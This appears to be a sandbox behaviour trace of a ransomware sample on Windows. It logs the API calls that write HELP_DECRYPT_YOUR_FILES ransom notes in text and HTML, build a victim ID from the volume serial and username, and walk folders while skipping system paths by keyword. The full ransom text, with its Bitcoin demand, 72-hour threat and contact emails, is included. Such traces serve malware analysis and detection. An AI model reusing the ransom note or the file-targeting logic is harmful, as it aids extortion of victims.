	[0189.916] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0189.916] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Favorites\\HELP_DECRYPT_YOUR_FILES.TXT") returned 59
	[0189.916] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\favorites\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0189.937] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0189.937] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0189.939] CloseHandle (hObject=0x380) returned 1
	[0189.953] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0189.953] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.954] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0189.955] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0189.955] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\favorites\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0189.955] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0189.955] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0189.955] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0189.956] CloseHandle (hObject=0x380) returned 1
	[0190.167] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0190.167] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0190.167] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0190.167] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Favorites\\HELP_DECRYPT_YOUR_FILES.HTML") returned 60
	[0190.167] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\favorites\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0190.172] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0190.172] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0190.176] CloseHandle (hObject=0x380) returned 1
	[0190.176] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0190.176] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0190.177] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.177] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0190.178] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0190.178] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\favorites\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0190.179] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0190.179] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0190.179] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0190.179] CloseHandle (hObject=0x380) returned 1
	[0190.180] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\favorites\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8ae0b8ea, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0190.180] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Favorites\\*.*") returned 35
	[0190.180] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0190.180] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Favorites\\*.*", cchLength=0x23 | out: lpsz="c:\\users\\rdhj0cnfevzx\\favorites\\*.*") returned 0x23
	[0190.180] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.180] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\*.*", lpSrch="windows") returned 0x0
	[0190.180] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.181] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\*.*", lpSrch="boot") returned 0x0
	[0190.181] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.181] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\*.*", lpSrch="system volume information") returned 0x0
	[0190.181] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.181] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0190.181] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.181] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\*.*", lpSrch="temp") returned 0x0
	[0190.181] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.182] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\*.*", lpSrch="program files") returned 0x0
	[0190.182] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.182] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\*.*", lpSrch="program files (x86)") returned 0x0
	[0190.182] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.182] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\*.*", lpSrch="appdata") returned 0x0
	[0190.182] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.182] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\*.*", lpSrch="application data") returned 0x0
	[0190.182] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.183] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\*.*", lpSrch="winnt") returned 0x0
	[0190.183] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.183] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\*.*", lpSrch="tmp") returned 0x0
	[0190.183] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.183] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\*.*", lpSrch="cache") returned 0x0
	[0190.183] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.183] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\*.*", lpSrch="temporary internet files") returned 0x0
	[0190.183] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.184] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\*.*", lpSrch="webcache") returned 0x0
	[0190.184] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.184] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\*.*", lpSrch="inetcache") returned 0x0
	[0190.184] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.184] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\*.*", lpSrch="nvidia") returned 0x0
	[0190.184] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.184] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\*.*", lpSrch="packages") returned 0x0
	[0190.184] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.185] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\*.*", lpSrch="cookies") returned 0x0
	[0190.185] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.185] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\*.*", lpSrch="programdata") returned 0x0
	[0190.185] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0190.185] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0190.185] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8ae0b8ea, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0190.185] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0190.185] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43053b43, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43053b43, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43079e90, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xd0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Bing.url", cAlternateFileName="")) returned 1
	[0190.186] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x436238c4, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0190.186] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ae0b8ea, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8ae0b8ea, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8ae31db4, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0190.186] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8aba970b, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8aba970b, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8abf5bdb, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0190.186] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43079e90, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43079e90, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1
	[0190.186] lstrcmpW (lpString1="Links", lpString2="..") returned 1
	[0190.186] lstrcmpW (lpString1="Links", lpString2=".") returned 1
	[0190.186] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\RDhJ0CNFevzX\\Favorites" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Favorites") returned="C:\\Users\\RDhJ0CNFevzX\\Favorites"
	[0190.186] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Favorites", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Favorites\\") returned="C:\\Users\\RDhJ0CNFevzX\\Favorites\\"
	[0190.186] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Favorites\\", lpString2="Links" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links") returned="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links"
	[0190.186] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links") returned="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links"
	[0190.187] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\") returned="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\"
	[0190.187] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\") returned="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\"
	[0190.187] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\*.*"
	[0190.187] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\favorites\\links\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43079e90, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43079e90, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0190.187] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\*.*") returned 41
	[0190.187] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0190.188] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\*.*", cchLength=0x29 | out: lpsz="c:\\users\\rdhj0cnfevzx\\favorites\\links\\*.*") returned 0x29
	[0190.188] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.188] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\links\\*.*", lpSrch="windows") returned 0x0
	[0190.188] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.188] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\links\\*.*", lpSrch="boot") returned 0x0
	[0190.188] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.188] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\links\\*.*", lpSrch="system volume information") returned 0x0
	[0190.188] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.189] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\links\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0190.189] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.189] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\links\\*.*", lpSrch="temp") returned 0x0
	[0190.189] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.189] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\links\\*.*", lpSrch="program files") returned 0x0
	[0190.189] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.189] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\links\\*.*", lpSrch="program files (x86)") returned 0x0
	[0190.189] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.191] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\links\\*.*", lpSrch="appdata") returned 0x0
	[0190.191] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.191] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\links\\*.*", lpSrch="application data") returned 0x0
	[0190.191] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.191] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\links\\*.*", lpSrch="winnt") returned 0x0
	[0190.192] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.192] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\links\\*.*", lpSrch="tmp") returned 0x0
	[0190.192] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.192] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\links\\*.*", lpSrch="cache") returned 0x0
	[0190.192] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.192] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\links\\*.*", lpSrch="temporary internet files") returned 0x0
	[0190.192] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.192] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\links\\*.*", lpSrch="webcache") returned 0x0
	[0190.193] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.193] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\links\\*.*", lpSrch="inetcache") returned 0x0
	[0190.193] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.193] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\links\\*.*", lpSrch="nvidia") returned 0x0
	[0190.193] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.193] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\links\\*.*", lpSrch="packages") returned 0x0
	[0190.193] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.194] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\links\\*.*", lpSrch="cookies") returned 0x0
	[0190.194] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.194] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\links\\*.*", lpSrch="programdata") returned 0x0
	[0190.194] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43079e90, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43079e90, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0190.194] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x43079e90, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43079e90, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43079e90, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0190.194] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1
	[0190.194] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1
	[0190.194] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\") returned="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\"
	[0190.194] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\desktop.ini") returned="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\desktop.ini"
	[0190.195] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\desktop.ini") returned 49
	[0190.195] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0190.195] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\desktop.ini", cchLength=0x31 | out: lpsz="c:\\users\\rdhj0cnfevzx\\favorites\\links\\desktop.ini") returned 0x31
	[0190.195] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.195] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\links\\desktop.ini", lpSrch="help_decrypt_your_files") returned 0x0
	[0190.195] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\favorites\\links\\desktop.ini" | out: lpString1="c:\\users\\rdhj0cnfevzx\\favorites\\links\\desktop.ini") returned="c:\\users\\rdhj0cnfevzx\\favorites\\links\\desktop.ini"
	[0190.195] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\favorites\\links\\desktop.ini") returned 49
	[0190.195] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0190.196] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.196] StrStrW (lpFirst=".ini", lpSrch=".") returned=".ini"
	[0190.196] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
